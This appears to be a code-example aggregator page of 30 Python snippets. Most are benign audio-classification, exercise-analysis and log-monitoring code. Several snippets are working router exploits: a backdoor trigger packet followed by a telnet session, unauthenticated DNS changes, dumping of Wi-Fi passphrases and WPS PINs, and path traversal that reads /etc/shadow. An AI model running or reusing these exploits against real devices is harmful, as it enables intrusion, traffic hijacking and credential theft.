Example #1
    def do_check(self, arg):
        utils.print_info('checking if module loaded')
        if not self.check_module_loaded():
            utils.print_failed(
                'checking module failed\n'
                'Please make sure you have already chosen a module')
            return

        utils.print_info('checking targets info')
        if not self.check_target_arg():
            utils.print_failed('checking targets info failed\n'
                               'Please make sure you have set the target info')
            return
        else:
            utils.print_success('checks passed')
        target = self.task.get_current()
        if self.module.check(target.host, target.port,
                             self.task.get_timeout()):
            module_name = inspect.getmodule(self.module).__name__[16:]
            exploits = target.affective_exploit
            if not exploits:
                a_exploit = [module_name]
            else:
                if module_name not in exploits:
                    # list.append returns None, so mutate first, then assign
                    exploits.append(module_name)
                a_exploit = exploits
            self.task.set_current(
                ExploitTarget(host=target.host,
                              port=target.port,
                              brand=target.brand,
                              alternative_exploit=target.alternative_exploit,
                              affective_exploit=a_exploit))
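
All of these snippets rely on a project-local utils module for colored console output. A minimal sketch of what those helpers might look like (an assumption for illustration, not the original implementation):

def print_info(msg):
    # Plain status line
    print("[*] {}".format(msg))

def print_success(msg):
    # Green: the operation succeeded
    print("\033[92m[+] {}\033[0m".format(msg))

def print_warning(msg):
    # Yellow: non-fatal problem
    print("\033[93m[!] {}\033[0m".format(msg))

def print_failed(msg):
    # Red: the operation failed
    print("\033[91m[-] {}\033[0m".format(msg))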
Example #2
def extract_features(tracks_dir="tracks/", feat_dir="features/"):
    utils.print_success("Extracting features")
    tracks_fn = os.listdir(tracks_dir)
    utils.create_dir(feat_dir)
    feat_dir = utils.create_dir(feat_dir + "svmbff")
    bextract = "bextract -mfcc -zcrs -ctd -rlf -flx -ws 1024 -as 898 -sv -fe "
    for index, filename in enumerate(tracks_fn):
        utils.print_progress_start(
            str(index) + "/" + str(len(tracks_fn)) + " " + filename)
        track_path = filename + ".mf"
        with open(track_path, "w") as filep:
            filep.write(tracks_dir + filename + "\n")
        new_fn = filename.split(".")[0] + ".arff"
        try:
            os.system(bextract + track_path + " -w " + new_fn +
                      "> /dev/null 2>&1")
        except Exception:
            utils.print_info(
                "You have to make marsyas available systemwide, tips:")
            utils.print_info(
                "http://marsyas.info/doc/manual/marsyas-user/Step_002dby_002dstep-building-instructions.html#Step_002dby_002dstep-building-instructions"
            )
            utils.print_info("http://stackoverflow.com/a/21173918")
            utils.print_error("Program exit")
        # print(new_fn)
        # print(feat_dir + " " + new_fn)
        os.rename(new_fn, feat_dir + new_fn)
        # os.rename("MARSYAS_EMPTY" + new_fn, feat_dir + new_fn)
        os.system("rm " + track_path)
    utils.print_progress_end()
    os.system("rm bextract_single.mf")
Example #3
def table1_exp1(folds_dir):
    utils.print_success("Experiment 1 in Table 1")
    fn_gts = "groundtruths/database1.csv"
    gts = utils.read_groundtruths(fn_gts)
    res_files = [
        name for name in os.listdir(folds_dir)
        if os.path.isfile(os.path.join(folds_dir, name)) and "results" in name
    ]
    acc = []
    f1 = []
    for res in res_files:
        predictions = []
        groundtruths = []
        preds = read_preds(folds_dir + res)
        for name in preds:
            name_gts = name.split(".")[0]
            if name_gts in gts:
                groundtruths.append(gts[name_gts])
                predictions.append(preds[name])
        acc.append(accuracy_score(groundtruths, predictions))
        predictions = [1 if i == "s" else 0 for i in predictions]
        groundtruths = [1 if i == "s" else 0 for i in groundtruths]
        f1.append(f1_score(groundtruths, predictions, average='binary'))
    # Print average ± standard deviation
    utils.print_info("Accuracy " + str(sum(acc) / float(len(acc))) + " ± " +
                     str(stdev(acc)))
    utils.print_info("F-Measure " + str(sum(f1) / float(len(f1))) + " ± " +
                     str(stdev(f1)))
    dir_res = utils.create_dir("stats/")
    with open(dir_res + "table1_accuracy.csv", "a") as filep:
        for val in acc:
            filep.write("SVMBFF," + str(val) + "\n")
    with open(dir_res + "table1_f1.csv", "a") as filep:
        for val in f1:
            filep.write("SVMBFF," + str(val) + "\n")
Example #4
def advice():
    results = analyze('squatData.txt')
    output_advice = pt.get_advice('squat', results)
    ut.print_success('Feedback retrieved')
    with open('advice_file.txt', 'wb') as advice_file:
        advice_file.write(output_advice)
Example #5
	def analyze_reps(self, exercise, data_file, labels=None, epsilon=0.15, gamma=20, delta=0.5, beta=1, auto_analyze=False, verbose=False):

		reps = [rep for rep in rs.separate_reps(data_file, exercise, self.keys[exercise], keysXYZ.columns)]
		
		if verbose:
			ut.print_success('Reps segmented and normalized for ' + exercise)

		if not auto_analyze:
			return reps
		
		#=====[ Get feature vector  ]=====
		feature_vectors = self.get_prediction_features_opt(exercise, reps, verbose)
		
		#=====[ Get results for classifications and populate dictionary  ]=====
		results = {}

		if verbose:
			print "\n\n###################################################################"
			print "######################## Classification ###########################"
			print "###################################################################\n\n"

		for key in feature_vectors:
			X = feature_vectors[key]
			classification = self.classify(exercise, key, X, verbose)
			results[key] = classification
			if verbose:
				print '\n\n', key, ':\n', classification, '\n'

		#=====[ Print advice based on results  ]=====
		print "\n\n###################################################################"
		print "########################### Feedback ##############################"
		print "###################################################################\n\n"
		return self.get_advice(exercise, results)
Example #6
def read_train_files(indir, separator=" "):
    """Description of read_train_files

    Gather local features and GT from every individual train songs
    """
    utils.print_success("Reading multiple train files")
    indir = utils.abs_path_dir(indir) + "/"
    groundtruths = []
    features = []
    included_extensions = ["csv"]
    filenames = [
        fn for fn in os.listdir(indir) if any(
            fn.endswith(ext) for ext in included_extensions)
    ]
    for index, filename in enumerate(filenames):
        print(str(index + 1) + "/" + str(len(filenames)) + " " + filename)
        sys.stdout.write("\033[F")  # Cursor up one line
        sys.stdout.write("\033[K")  # Clear line
        with open(indir + filename, "r") as filep:
            for row in filep:
                line = row.split(separator)
                features.append([float(i) for i in line[:-1]])
                groundtruths.append(line[-1][:-1])
    sys.stdout.write("\033[K")  # Clear line
    return features, groundtruths
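
A hypothetical call, assuming a folder of CSV files whose rows are space-separated feature values followed by a groundtruth tag:

features, groundtruths = read_train_files("features/train", separator=" ")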
Example #7
    def start(self):
        """
        Start processing the log file.
        """
        print_info(f"Start monitoring {self.log_file}")
        with open(self.log_file) as log_file:
            reader = DictReader(log_file)

            # Keep track of the number of requests in the log window.
            request_counts = []
            while True:
                try:
                    timestamp, average_bytes, most_hit_section, count = self.read_logs(reader, self.log_interval)
                    print_info(f"{timestamp}\t{average_bytes:.2f}\t{most_hit_section}")

                    request_counts.append(count)
                    # Only keep enough counts to cover the time in the log window.
                    request_counts = request_counts[-(self.log_window // self.log_interval):]
                    requests_per_second = sum(request_counts) / self.log_window

                    # Check if the requests per second has exceeded or recovered from the traffic threshold.
                    if requests_per_second >= self.threshold and self.high_traffic is False:
                        print_error(f"High traffic generated an alert - hits = {requests_per_second:.2f} requests per "
                                    f"second, triggered at {timestamp}")
                        self.high_traffic = True
                    elif requests_per_second < self.threshold and self.high_traffic is True:
                        print_success(f"Traffic has stabilized - hits = {requests_per_second:.2f} requests per second, "
                                      f"recovered at {timestamp}")
                        self.high_traffic = False

                    # Simulate time passing. DO NOT USE for real access logs.
                    time.sleep(self.log_interval)
                except StopIteration:
                    print_warning("End of file has been reached.")
                    break
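
A hypothetical way to drive this monitor; the class name and constructor arguments below are assumptions inferred from the attributes the method uses:

monitor = LogMonitor(log_file="access.log",  # CSV access log read by DictReader
                     log_interval=10,        # seconds between reads
                     log_window=120,         # alerting window in seconds
                     threshold=10)           # requests per second
monitor.start()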
Example #8
    def run(self, host, port, timeout):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(timeout)

        utils.print_info("Sending backdoor packet...")

        response = ""
        try:
            sock.sendto("HELODBG", (host, 39889))
            response = sock.recv(1024)
        except Exception:
            pass

        sock.close()

        if "Hello" in response:
            utils.print_success("Target seems to vulnerable")
            utils.print_info(
                "Trying to connect to the telnet service {}:{}".format(
                    host, 23))

            try:
                tn = telnetlib.Telnet(host, 23)
                tn.interact()
            except Exception as e:
                utils.print_failed(
                    "Exploit failed - could not connect to the telnet service")
        else:
            utils.print_failed(
                "Exploit failed - target does not seem to be vulnerable")
Example #9
    def login(self, host, port, timeout):
        url = 'http://{}:{}/'.format(host, port)
        resp, err = self.http_get(self.s, url, timeout)
        if err:
            self.print_requests_err(host, port, err)
            return False

        utils.print_info('"Retrieving random login token..."')
        token = self.regx_grab(resp.text, r'Frm_Logintoken"\)\.value = "(.*)";', 1)
        if token:
            utils.print_info(
                "Trying to log in with credentials {} : {}".format(self.username, self.password))
            url = 'http://{}:{}/'.format(host, port)
            data = {"Frm_Logintoken": token,
                    "Username": self.username,
                    "Password": self.password,
                    "action": "login"}
            resp, err = self.http_post(self.s, url, timeout, data)
            if err:
                utils.print_warning('{}:{} request error, msg: {}'.format(host, port, type(err).__name__))
                return False
            if "Username" not in resp.text and "Password" not in resp.text:
                utils.print_success("Successful authentication")
                return True
            else:
                return False
        else:
            utils.print_warning('Cannot find the login token')
            return False
Example #10
    def analyze_reps(self, exercise, data_file, labels=None, epsilon=0.15, gamma=20, delta=0.5, beta=1,
                     auto_analyze=False, verbose=True):

        reps = [rep for rep in rs.separate_reps(data_file, exercise, self.keys[exercise], keysXYZ.columns)]

        if verbose:
            ut.print_success('Reps segmented and normalized for ' + exercise)

        if not auto_analyze:
            return reps

        # =====[ Get feature vector  ]=====
        feature_vectors = self.get_prediction_features_opt(exercise, reps, verbose)

        # =====[ Get results for classifications and populate dictionary  ]=====
        results = {}

        if verbose:
            print("\n\n###################################################################")
            print("######################## Classification ###########################")
            print("###################################################################\n\n")

        for key in feature_vectors:
            X = feature_vectors[key]

            classification = self.classify(exercise, key, X, verbose)
            results[key] = classification
            if verbose:
                print('\n\n', key, ':\n', classification, '\n')

        # =====[ Print advice based on results  ]=====
        print("\n\n###################################################################")
        print("########################### Feedback ##############################")
        print("###################################################################\n\n")
        return self.get_advice(exercise, results)
Example #11
def run_kea_on_folds(folds_dir):
    """Description of run_kea_on_folds

    Wrapper for kea on folds
    """
    folds_dir = utils.abs_path_dir(folds_dir)
    out_file = folds_dir + "/results.txt"
    if os.path.exists(folds_dir + "/train_test.arff"):
        train_file = folds_dir + "/train_test.arff"
        test_file = train_file
        run_kea(train_file, test_file, out_file)
    else:
        nb_folds = len([
            name for name in os.listdir(folds_dir)
            if os.path.isfile(os.path.join(folds_dir, name))
        ])
        # Run on multiple train/test
        for index in range(1, int(nb_folds / 2) + 1):
            utils.print_success("Train/Test on fold " + str(index))
            train_file = folds_dir + "/train_" + str(index).zfill(2) + ".arff"
            test_file = folds_dir + "/test_" + str(index).zfill(2) + ".arff"
            out_file = folds_dir + "/results_" + str(index).zfill(2) + ".arff"
            run_kea(train_file, test_file, out_file)

        utils.print_warning("TODO multiprocessing")
Example #12
def plot_isrc_year_distribution(isrc_filename="ISRC_valid.txt", img_outdir=""):
    """Description of plot_isrc_year_distribution

    Create a png image of the distribution of ISRCs over the years
    """
    img_outdir = utils.abs_path_dir(img_outdir)
    years = []
    with open(isrc_filename, 'r') as csvfile:
        isrcs = csv.reader(csvfile)
        for isrc in isrcs:
            # Characters 6-7 of an ISRC encode the two-digit registration year
            year = int(isrc[0][5:7]) + 2000
            if year > date.today().year:
                year -= 100
            years.append(year)

    axe = plt.subplot(111)
    hist_bins_range = range(min(years), max(years) + 1, 1)
    plt.hist(years, bins=hist_bins_range, color="#BBBBBB")
    plt.xlabel("Registration years")
    plt.ylabel("ISRC number")
    plt.xlim(min(years) - 2, max(years) + 2)
    axe.spines['top'].set_visible(False)
    axe.spines['right'].set_visible(False)
    axe.get_xaxis().tick_bottom()
    axe.get_yaxis().tick_left()
    plt.savefig(img_outdir + "Figure_1_ISRC_year_distribution.png")
    utils.print_success("ISRC year distribution image saved")
Example #13
    def run(self, host, port, timeout):
        # TODO: not tested
        if self.primary_dns == '':
            p_dns = input('Please input the PRIMARY DNS: ')
            if utils.valid_host(p_dns):
                self.primary_dns = p_dns
            else:
                self.run(host, port, timeout)
                return

        if self.second_dns == '':
            s_dns = input('Please input the SECOND DNS: ')
            if utils.valid_host(s_dns):
                self.second_dns = s_dns
            else:
                self.run(host, port, timeout)
                return

        utils.print_info('Using PRIMARY DNS: {}, SECOND DNS: {}'.format(self.primary_dns, self.second_dns))
        if self.input_to_continue():
            url = 'http://{}:{}/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary={}&dnsSecondary={}'\
                .format(host, port, self.primary_dns, self.second_dns)
            resp, err = self.http_post(self.s, url, timeout, None)
            if err:
                self.print_requests_err(host, port, err)
                return
            if resp.status_code == 200:
                utils.print_success("DNS settings has been changed")
            else:
                utils.print_failed("Could not change DNS settings")
        else:
            self.primary_dns = ''
            self.second_dns = ''
Example #14
def main():
    begin = int(round(time.time() * 1000))
    PARSER = argparse.ArgumentParser(description="Bayle et al. (2017) algorithm")
    PARSER.add_argument(
        "-d",
        "--indir",
        help="input dir containing all local features extracted by YAAFE",
        type=str,
        default="/media/sf_github/yann/train/",
        metavar="indir")
    PARSER.add_argument(
        "-i",
        "--gts",
        help="input file containing all track groundtruths",
        type=str,
        default="filelist_train.tsv")

    indir = "features/database1/"
    file_gts_track = "groundtruths/database1.csv"
    new_algo_final(indir, file_gts_track)
    # figure1a(PARSER.parse_args().gts)
    # figures1bd(PARSER.parse_args().indir, PARSER.parse_args().gts)
    # figure2(PARSER.parse_args().indir, PARSER.parse_args().gts)
    
    # Local feat processing

    # Global feat processing
    # bayle_fig3()

    utils.print_success("Done in " + str(int(round(time.time() * 1000)) - begin) + "ms")
Example #15
def classify(file_features):
    utils.print_success("Classifying")
    clf = linear_model.RANSACRegressor(random_state=RANDOM_STATE)
    filenames, features, groundtruths = read_file(file_features)
    acc = []
    f1 = []
    skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=RANDOM_STATE)
    for train, test in skf.split(features, groundtruths):
        clf.fit(features[train], groundtruths[train])
        preds_float = clf.predict(features[test])
        predictions = [i >= 0.5 for i in preds_float]
        acc.append(accuracy_score(groundtruths[test], predictions))
        f1.append(f1_score(groundtruths[test], predictions,
                           average="weighted"))
    # Print average ± standard deviation
    print("Accuracy " + str(sum(acc) / float(len(acc))) + " ± " +
          str(stdev(acc)))
    print("F-Measure " + str(sum(f1) / float(len(f1))) + " ± " +
          str(stdev(f1)))
    dir_stats = utils.create_dir("stats/")
    with open(dir_stats + "table1_accuracy.csv", "a") as filep:
        filep.write("GA")
        for val in acc:
            filep.write("," + str(val))
        filep.write("\n")
    with open(dir_stats + "table1_f1.csv", "a") as filep:
        filep.write("GA")
        for val in f1:
            filep.write("," + str(val))
        filep.write("\n")
Example #16
    def run(self, host, port, timeout):
        # TODO: not tested
        if self.info is None:
            url = "http://{}:{}/cgi-bin/dget.cgi?cmd=wifi_AP1_ssid,wifi_AP1_hidden,wifi_AP1_passphrase," \
                  "wifi_AP1_passphrase_wep,wifi_AP1_security_mode,wifi_AP1_enable,get_mac_filter_list," \
                  "get_mac_filter_switch,get_client_list,get_mac_address,get_wps_dev_pin,get_wps_mode," \
                  "get_wps_enable,get_wps_current_time&_=1458458152703" \
                .format(host, port)

            resp, err = self.http_get(self.s, url, timeout)
            if err is None:
                if resp.status_code == 200:
                    try:
                        self.info = json.loads(resp.text)
                    except ValueError:
                        pass

        if self.info and len(self.info):
            utils.print_success('Exploit success')
            t = prettytable.PrettyTable()
            t.add_column('Key', list(self.info.keys()))
            t.add_column('Value', list(self.info.values()))
            utils.print_info(t)
            utils.logger.send((host, port, t))
        else:
            utils.print_failed('Exploit failed')
Example #17
def preprocess_yaafe_features(dir_features="features/database1/"):
    utils.print_success("Preprocessing YAAFE's features  (approx. 2 minutes)")
    groundtruths = utils.read_groundtruths("groundtruths/database1.csv")
    dir_features = utils.abs_path_dir(dir_features)
    filenames = os.listdir(dir_features)
    dir_tmp = utils.create_dir(utils.create_dir("src/tmp") + "ghosal")
    res_file_name = dir_tmp + "database1.csv"
    res_file = open(res_file_name, "w")
    res_file.write(
        "filename,MFCC_01,MFCC_02,MFCC_03,MFCC_04,MFCC_05,MFCC_06,MFCC_07,MFCC_08,MFCC_09,MFCC_10,MFCC_11,MFCC_12,MFCC_13,tag\n"
    )
    nb_header_lines = 4
    for index, filename in enumerate(filenames):
        utils.print_progress_start(
            str(index + 1) + "/" + str(len(filenames)) + " " + filename)
        with open(dir_features + filename, "r+") as filep:
            tmp_mfcc = np.zeros(shape=(13, 1))
            for line_index, line in enumerate(filep):
                # Skip the first header lines generated by YAAFE (indices 0-4)
                if line_index > nb_header_lines:
                    mfccs = line[:-1].split(",")
                    for mfcc_index, mfcc in enumerate(mfccs):
                        tmp_mfcc[mfcc_index] += float(mfcc)
            tmp_mfcc /= (line_index - nb_header_lines)
            mfcc_str = ["%.15f" % number for number in tmp_mfcc]
            filen = filename.split(".")[0]
            if filen in groundtruths:
                res_file.write(filen + "," + ",".join(mfcc_str) + "," +
                               groundtruths[filen] + "\n")
    res_file.close()
    return res_file_name
Example #18
	def get_prediction_features(self, exercise, reps):
			
		if exercise == 'squat':
			#=====[ Retrieves relevant training data for each classifier  ]=====
			X0, Y, file_names = self.extract_advanced_features(reps=reps, multiples=[0.5], predict=True)
			X1, Y, file_names = self.extract_advanced_features(reps=reps, multiples=[0.2, 0.4, 0.6, 0.8], predict=True)
			X3, Y, file_names = self.extract_advanced_features(reps=reps, multiples=[0.05, 0.15, 0.2, 0.25, 0.3, 0.35, 0.4, 0.45, 0.5, 0.55, 0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9, 0.95], predict=True)

			#=====[ Sets up dictionary of feature vectors  ]=====
			X = {}
			X['bend_hips_knees'] = preprocessing.StandardScaler().fit_transform(X3['bend_hips_knees'])
			X['stance_width'] = preprocessing.StandardScaler().fit_transform(X1['stance_width'])
			X['squat_depth'] = preprocessing.StandardScaler().fit_transform(X0['squat_depth'])
			X['knees_over_toes'] = preprocessing.StandardScaler().fit_transform(np.concatenate([X3[x] for x in X3],axis=1))
			X['back_hip_angle'] = preprocessing.StandardScaler().fit_transform(np.concatenate([X0[x] for x in X0],axis=1))

		elif exercise == 'pushup':
			#=====[ Retrieves relevant training data for each classifier  ]=====
			X3, Y, file_names  = self.extract_pu_features(reps=reps, multiples=[0.05, 0.15, 0.2, 0.25, 0.3, 0.35, 0.4, 0.45, 0.5, 0.55, 0.6, 0.65, 0.7, 0.75, 0.8, 0.85, 0.9, 0.95], predict=True)
			X4, Y, file_names = self.extract_pu_features(reps=reps, multiples=[float(x)/100 for x in range(100)], predict=True)

			X30 = np.concatenate([X3[x] for x in X3],axis=1)
			X40 = np.concatenate([X4[x] for x in X4],axis=1)

			#=====[ Sets up dictionary of feature vectors  ]=====
			X = {}
			X['head_back'] = preprocessing.StandardScaler().fit_transform(X40)
			X['knees_straight'] = preprocessing.StandardScaler().fit_transform(X30)
			X['elbow_angle'] = preprocessing.StandardScaler().fit_transform(X3['elbow_angle'])


		ut.print_success('Features extracted for ' + exercise)

		return X
Example #19
def new_algo_final(indir, file_gts_track):
    utils.print_success("Approx. time ~6 hours.")
    # Preprocess arg
    indir = utils.abs_path_dir(indir)
    file_gts_track = utils.abs_path_file(file_gts_track)
    dir_tmp = utils.create_dir(utils.create_dir("src/tmp") + "bayle")
    feat_frame_train = utils.create_dir(dir_tmp + "feat_frame_train")
    feat_frame_test = utils.create_dir(dir_tmp + "feat_frame_test")
    outdir_global = utils.create_dir(dir_tmp + "feat_track")
    feat_train = outdir_global + "train.csv"
    feat_test = outdir_global + "test.csv"
    models_dir = utils.create_dir(dir_tmp + "models")
    loc_feat_testset_dirpath = "features/database2/"
    filelist_train = "groundtruths/database1.csv"
    filelist_test = "groundtruths/database2.csv"
    models_global = utils.create_dir(dir_tmp + "models_track")

    process_local_feat(indir, file_gts_track, outdir_local=feat_frame_train, out_feat_global=feat_train, train=False)
    classify.create_models(outdir=models_dir, train_dir=feat_frame_train, separator=",", classifiers="RandomForest")

    """
    Create features at track scale for the train set
    Features: MFCC + Delta + Double Delta + ngrams + hist
    """
    model_file = "src/tmp/bayle/models/RandomForest/RandomForest.pkl"
    model_file = "/media/sf_DATA/ReproducibleResearchIEEE2017/src/tmp/bayle/models/RandomForest/RandomForest.pkl"
    create_track_feat_testset(indir, filelist_train, feat_train, model_file, train=True)

    # # 15h28m44s to 19h08m28s Done in 13184117ms
    create_track_feat_testset(loc_feat_testset_dirpath, filelist_test, feat_test, model_file)  

    classify.create_models(outdir=models_global, train_file=feat_train, classifiers="RandomForest")
    process_results(feat_train, feat_test)
Example #20
def plot_precision_recall(indir, gts_file, outdir):
    groundtruths = read_item_tag(gts_file)
    plt.figure(1)

    indir = utils.abs_path_dir(indir)
    for item in os.listdir(indir):
        if ".csv" in item:
            isrcs = read_preds(indir + "/" + item)
            test_groundtruths = []
            predictions = []
            for isrc in isrcs:
                if isrc in groundtruths:
                    test_groundtruths.append(groundtruths[isrc])
                    predictions.append(isrcs[isrc])
            test_groundtruths = [tag == "s" for tag in test_groundtruths]
            precision, recall, _ = precision_recall_curve(
                test_groundtruths, predictions)
            plt.plot(recall,
                     precision,
                     label=item[:-4] + " (" + str(
                         round(
                             average_precision_score(test_groundtruths,
                                                     predictions), 3)) + ")")

    plt.xlabel('Recall')
    plt.ylabel('Precision')
    plt.ylim([0.0, 1.05])
    plt.xlim([-0.05, 1.05])
    plt.title('Precision-Recall curve for Algo (AUC)')
    plt.legend(loc='best')
    plt.savefig(outdir + "precision_recall.png", dpi=200, bbox_inches="tight")
    # plt.show()
    plt.close()
    utils.print_success("Precision-Recall curve created in " + outdir)
Example #21
def main(args):
    """
    @brief      Main entry point
    Singer Gender Identification
        Extract features (yaafe)
            voice
            song
        Experiment 1 : 5-CV train voice Test voice
        Experiment 2 : 5-CV train song Test song
        Experiment 3 : train song + voice Test song
        Experiment 4 : train song + voice Test Simbals
        IEEE : train on good frames for instru male female
    """
    utils.print_success("Starting SGI")
    # dir_audio = "E:/_These/DataSets/Recisio/audio/"
    # dir_audio = "/media/sf_SharedFolder/DataSets/Recisio/audio/"
    # kara1k = "../data/filelist.csv"
    # paths = create_filelist(kara1k, dir_audio)
    # available_files = generate_singing_voice_track(paths)
    # extract_features(available_files)
    # extract_features()
    # cpt()
    # remove_silence("gender.txt")
    folder = "/media/sf_DATA/ISMIR2017/features/gender/"
    # add_groundtruths(folder)
    # merge_files(folder, "song_nonzero")
    # merge_files(folder, "sv_nonzero")
    n_folds = 10
    outfilename = folder + "sv_nonzero_results.txt"
    cross_validation(folder + "sv_nonzero.csv", n_folds, outfilename)
    outfilename = folder + "song_nonzero_results.txt"
    cross_validation(folder + "song_nonzero.csv", n_folds, outfilename)
Example #22
def advice():
	results = analyze('squatData.txt')
	output_advice = pt.get_advice('squat', results)
	ut.print_success('Feedback retrieved')
	with open('advice_file.txt', 'wb') as advice_file:
		advice_file.write(output_advice)
Example #23
def cover_song_identification():
    """
    @brief      Experiment which tries to identify the cover from an origin song
    
    @return     No return value
    """

    utils.print_success("Reading train and test files")

    # Load train files i.e. origin songs aka origins
    dir_feat_origins = "D:/_Doctorat/ISMIR2017/features/origins/"
    train = {}
    # train = add_feat_yaafe(dir_feat_origins, train)
    train = add_feat_essentia(dir_feat_origins, train)

    # Load test files i.e. cover song(s) aka covers
    dir_feat_covers = "E:/_These/DataSets/Recisio/features/"
    test = {}
    # test = add_feat_yaafe(dir_feat_covers, test, train)
    test = add_feat_essentia(dir_feat_covers, test, train)

    # filen = "test.csv"
    # write2file(train, filen)
    # write2file(test, filen)

    # Train / test and display results
    utils.print_success("Train / test and display results")
    classify.train_test(train, test)
Example #24
def main():
    parser = argparse.ArgumentParser(
        description='Checks the validity of a signature against a public key and a message, and prints True or False')
    parser.add_argument('-s', '--signature', type=str, required=True, help='signature')
    parser.add_argument("-p", "--public_key", type=str, required=True, help='Public key or public aggregate X~')
    parser.add_argument('-m', '--message', type=str, required=True, help='Message')
    
    args = parser.parse_args()
    pubkey = args.public_key
    msg = args.message
    sig = args.signature
    
    try: 
        msg_bytes = sha256(msg.encode())
        sig_bytes = bytes.fromhex(sig)
        pubkey_bytes = bytes.fromhex(pubkey)

        result = schnorr_verify(msg_bytes, pubkey_bytes, sig_bytes)
        print("\nThe signature is: ", sig)
        print("The public key is: ", pubkey)
        print('The message digest is:', msg_bytes.hex())
        print("\nIs the signature valid for this message and this public key? ")
        if result:
            print_success("Yes")
        else:
            print_fails("No")
    except Exception as e:
        print_fails("[e] Exception:", e)
        sys.exit(2)
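
A hypothetical invocation, assuming the script is saved as verify.py (the hex values are placeholders):

# python verify.py -m "message" -p <hex public key> -s <hex signature>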
Example #25
    def run(self, host, port, timeout):
        # TODO: not tested
        if self.primary_dns == '':
            p_dns = input('Please input the PRIMARY DNS: ')
            if utils.valid_host(p_dns):
                self.primary_dns = p_dns
            else:
                self.run(host, port, timeout)
                return

        if self.second_dns == '':
            s_dns = input('Please input the SECOND DNS: ')
            if utils.valid_host(s_dns):
                self.second_dns = s_dns
            else:
                self.run(host, port, timeout)
                return

        utils.print_info('Using PRIMARY DNS: {}, SECOND DNS: {}'.format(
            self.primary_dns, self.second_dns))
        if self.input_to_continue():
            url = "http://{}:{}/ddnsmngr.cmd?action=apply&service=0&enbl=0&" \
                  "dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" \
                .format(host, port, self.primary_dns, self.second_dns)
            resp, err = self.http_post(self.s, url, timeout, None)
            if err:
                self.print_requests_err(host, port, err)
                return
            if resp.status_code == 200:
                utils.print_success("DNS settings has been changed")
            else:
                utils.print_failed("Could not change DNS settings")
        else:
            self.primary_dns = ''
            self.second_dns = ''
Example #26
def experiment_2():
    utils.print_success("Experiment 2")
    groundtruths_file = "groundtruths/database2.csv"
    dir_pred = "predictions/"
    predictions_files = os.listdir(dir_pred)
    gts = read_item_tag(groundtruths_file)
    for pred_file in predictions_files:
        algo_name = pred_file.split("/")[-1][:-4]
        utils.print_info(algo_name)
        if "Ghosal" in algo_name:
            # Change threshold as RANSAC does not produce predictions in [0;1]
            threshold = 0.
        else:
            threshold = 0.5
        test_groundtruths = []
        predictions = []
        with open(dir_pred + pred_file, "r") as filep:
            for line in filep:
                row = line[:-1].split(",")
                isrc = row[0]
                if isrc in gts:
                    test_groundtruths.append(gts[isrc]) 
                    predictions.append("s" if float(row[1]) > threshold else "i")
        results_experiment_2(algo_name, predictions, test_groundtruths)

    algo_name = "Random"
    utils.print_info(algo_name)
    test_groundtruths = ["s", ] * test_groundtruths.count("s") + ["i", ] * test_groundtruths.count("i")
    predictions = ["s", "i", ] * int(len(test_groundtruths)/2)
    if len(test_groundtruths) % 2:
        predictions += ["s"]
    results_experiment_2(algo_name, predictions, test_groundtruths)
Example #27
    def run(self, host, port, timeout):
        filename = input('Please input filename (default: /etc/shadow): ')
        if filename == '':
            filename = '/etc/shadow'

        url = "{}:{}/cgi-bin/webproc".format(host, port)
        data = {
            "getpage": "html/index.html",
            "*errorpage*": "../../../../../../../../../../..{}".format(filename),
            "var%3Amenu": "setup",
            "var%3Apage": "connected",
            "var%": "",
            "objaction": "auth",
            "%3Ausername": "******",
            "%3Apassword": "******",
            "%3Aaction": "login",
            "%3Asessionid": "abcdefgh"
        }

        # connection
        response, err = self.http_post(self.s, url, timeout, data)
        if err:
            self.print_requests_err(host, port, err)
            return

        if response.status_code == 200:
            utils.print_success("Exploit success")
            utils.print_info("File: {}".format(filename))
            utils.print_info(response.text)
        else:
            utils.print_failed("Exploit failed")
Example #28
def yaafe_feat_extraction(dir_tracks):
    """Description of yaafe_feat_extraction
    yaafe.py -r 22050 -f "mfcc: MFCC blockSize=2048 stepSize=1024" audio_fn.txt
    """
    utils.print_success("YAAFE features extraction (approx. 8 minutes)")
    
    # Assert Python version
    if sys.version_info.major != 2:
        utils.print_error("Yaafe needs Python 2 environment")
    
    # Assert folder exists
    dir_tracks = utils.abs_path_dir(dir_tracks)    
    
    filelist = os.listdir(dir_tracks)
    dir_feat = utils.create_dir(utils.create_dir("features") + "database1")
    # dir_tmp = utils.create_dir("tmp")
    # dir_yaafe = utils.create_dir(dir_tmp + "yaafe")
    # fn_filelist = dir_yaafe + "filelist.txt"
    dir_current = os.getcwd()
    os.chdir(dir_tracks)
    yaafe_cmd = 'yaafe -r 22050 -f "mfcc: MFCC blockSize=2048 stepSize=1024" '
    yaafe_cmd += "--resample -b " + dir_feat + " "
    for index, filen in enumerate(filelist):
        utils.print_progress_start(str(index+1) + "/" + str(len(filelist)) + " " + filen)
        os.system(yaafe_cmd + filen + "> /dev/null 2>&1")
    utils.print_progress_end()
    os.chdir(dir_current)
Example #29
def experiments_2_3(vqmm_cmd, codebook_file):
    utils.print_success("Experiment 2 & 3 (approx. 6h")
    dir_tmp = utils.create_dir(utils.create_dir("src/tmp") + "vqmm")

    # train
    dir_models = utils.create_dir(dir_tmp + "models_expe2_3")
    train(vqmm_cmd, codebook_file, dir_models, dir_tmp + "filelist.txt")

    # Models file
    # Need to explicitly create models_file here for VQMM
    models_list = os.listdir(dir_models)
    models_file = dir_tmp + "models_file_expe2_3.txt"
    with open(models_file, "w") as filep:
        for model_path in models_list:
            if not "NOT" in model_path:
                filep.write(dir_models + model_path + "\n")

    # test
    test_dir = utils.abs_path_dir("features/database2/")
    groundtruths = utils.read_groundtruths("groundtruths/database2.csv")
    test_file_list = os.listdir(test_dir)
    with open(dir_tmp + "test_file_list.txt", "w") as filep:
        for test_filen in test_file_list:
            filep.write(test_dir + test_filen + "\t" +
                        groundtruths[test_filen.split("_")[0]] + "\n")
    dir_res = utils.create_dir(dir_tmp + "results_expe2_3")
    test(vqmm_cmd,
         codebook_file,
         outputdir=dir_res,
         models_file=models_file,
         testfile=dir_tmp + "test_file_list.txt")

    # disp results
    utils.print_success("Experiment 2 & 3 Done processing")
Example #30
def create_cbk(vqmm_cmd, files_list, file_cbk):
    utils.print_success("Creating codebook")
    randomSeed = "1"
    codebookSize = "100"
    subprocess.call([
